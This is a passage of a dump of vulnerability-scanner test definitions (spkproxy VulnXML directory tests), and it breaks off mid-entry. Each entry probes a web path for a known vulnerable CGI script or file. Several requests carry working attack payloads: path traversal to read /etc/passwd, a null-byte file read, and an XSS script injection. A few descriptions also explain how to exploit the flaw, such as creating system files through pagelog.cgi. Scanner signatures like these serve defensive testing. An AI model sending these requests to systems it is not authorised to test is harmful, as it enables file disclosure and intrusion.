(mini_logger.cgi) "Default password: guest" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mini_logger.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1089.xml0100664000076500007650000000707707566204543021761 0ustar davedave (mkilog.exe) "This CGI can give an attacker a lot of information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mkilog.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1090.xml0100664000076500007650000000707707566204543021751 0ustar davedave (mkplog.exe) "This CGI can give an attacker a lot of information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mkplog.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1091.xml0100664000076500007650000000714107566204543021742 0ustar davedave (mmstdod.cgi) "May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mmstdod.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1092.xml0100664000076500007650000000735307566204543021750 0ustar davedave (mrtg.cfg?cfg=../../../../../../../../etc/passwd) "Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mrtg.cfg?cfg=../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1093.xml0100664000076500007650000000735307566204543021751 0ustar davedave (mrtg.cgi?cfg=../../../../../../../../etc/passwd) "Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1094.xml0100664000076500007650000000736507566204543021755 0ustar davedave (mrtg.cgi?cfg=blah) "Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mrtg.cgi?cfg=blah HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Cannot find the given config file 200 Cannot find the given config file 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1095.xml0100664000076500007650000000721407566204543021747 0ustar davedave (multihtml.pl?multi=/etc/passwd%00html) "This CGI allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}multihtml.pl?multi=/etc/passwd%00html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1096.xml0100664000076500007650000000731107566204543021746 0ustar davedave (myguestbook.cgi?action=view) "myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}myguestbook.cgi?action=view HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1097.xml0100664000076500007650000000721007566204543021745 0ustar davedave (ncommerce3/ExecMacro/macro.d2w/%0a%0a) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ncommerce3/ExecMacro/macro.d2w/%0a%0a HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1098.xml0100664000076500007650000000724207566204543021753 0ustar davedave (ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1099.xml0100664000076500007650000000732007566204543021751 0ustar davedave (netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd) "This CGI allows attackers to view arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-10.xml0100664000076500007650000000705107566204543021570 0ustar davedave (localstart.asp) "iisstart.asp detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}localstart.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1100.xml0100664000076500007650000000711307566204543021730 0ustar davedave (netpad.cgi) "netpad.cgi may be an indication of a malicious user on the system 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}netpad.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1101.xml0100664000076500007650000000726207566204543021736 0ustar davedave (newsdesk.cgi?t=../../../../../../../../../../etc/passwd) "This CGI allows attackers to view arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}newsdesk.cgi?t=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1102.xml0100664000076500007650000000705407566204543021736 0ustar davedave (nlog-smb.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nlog-smb.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1103.xml0100664000076500007650000000705207566204543021735 0ustar davedave (nlog-smb.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nlog-smb.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1104.xml0100664000076500007650000000735107566204543021740 0ustar davedave (nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00) "EmuMail allows any file to be retrieved from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1105.xml0100664000076500007650000000713407566204543021740 0ustar davedave (nph-maillist.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nph-maillist.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1106.xml0100664000076500007650000000705207566204543021740 0ustar davedave (nph-publish) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nph-publish HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1107.xml0100664000076500007650000000713707566204543021745 0ustar davedave (nph-publish.cgi) "This CGI may allow attackers to execute arbitrary commands on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nph-publish.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1108.xml0100664000076500007650000000712507566204543021743 0ustar davedave (nph-test-cgi) "This CGI lets attackers get a directory listing of the CGI directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nph-test-cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1109.xml0100664000076500007650000000704607566204543021746 0ustar davedave (ntitar.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ntitar.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1110.xml0100664000076500007650000000715707566204543021741 0ustar davedave (opendir.php?/etc/passwd) "This CGI allows attackers to read any file on the web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}opendir.php?/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1111.xml0100664000076500007650000000721207566204543021732 0ustar davedave (orders/orders.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}orders/orders.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1112.xml0100664000076500007650000000720607566204543021736 0ustar davedave (pagelog.cgi) "Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pagelog.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1113.xml0100664000076500007650000000724607566204543021743 0ustar davedave (pals-cgi?palsAction=restart&documentName=/etc/passwd) "This CGI allows remote users to read system files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1114.xml0100664000076500007650000000703407566204543021737 0ustar davedave (pass) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pass HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1115.xml0100664000076500007650000000704007566204543021735 0ustar davedave (passwd) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1116.xml0100664000076500007650000000705007566204543021737 0ustar davedave (passwd.txt) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}passwd.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1117.xml0100664000076500007650000000704407566204543021743 0ustar davedave (password) "This could be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}password HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1118.xml0100664000076500007650000000757307566204543021753 0ustar davedave (pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E) "Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1119.xml0100664000076500007650000000722607566204543021747 0ustar davedave (Pbcgi.exe) "Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}Pbcgi.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1120.xml0100664000076500007650000000702707566204543021736 0ustar davedave (perl) "Shell/interpreter found" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}perl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1121.xml0100664000076500007650000000703107566204543021732 0ustar davedave (perl.exe) "Can run PERL code" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}perl.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1122.xml0100664000076500007650000000721007566204543021732 0ustar davedave (perl.exe?-v) "perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}perl.exe?-v HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1123.xml0100664000076500007650000000717407566204543021744 0ustar davedave (perl?-v) "perl is installed in the CGI directory. This essentially gives attackers a system 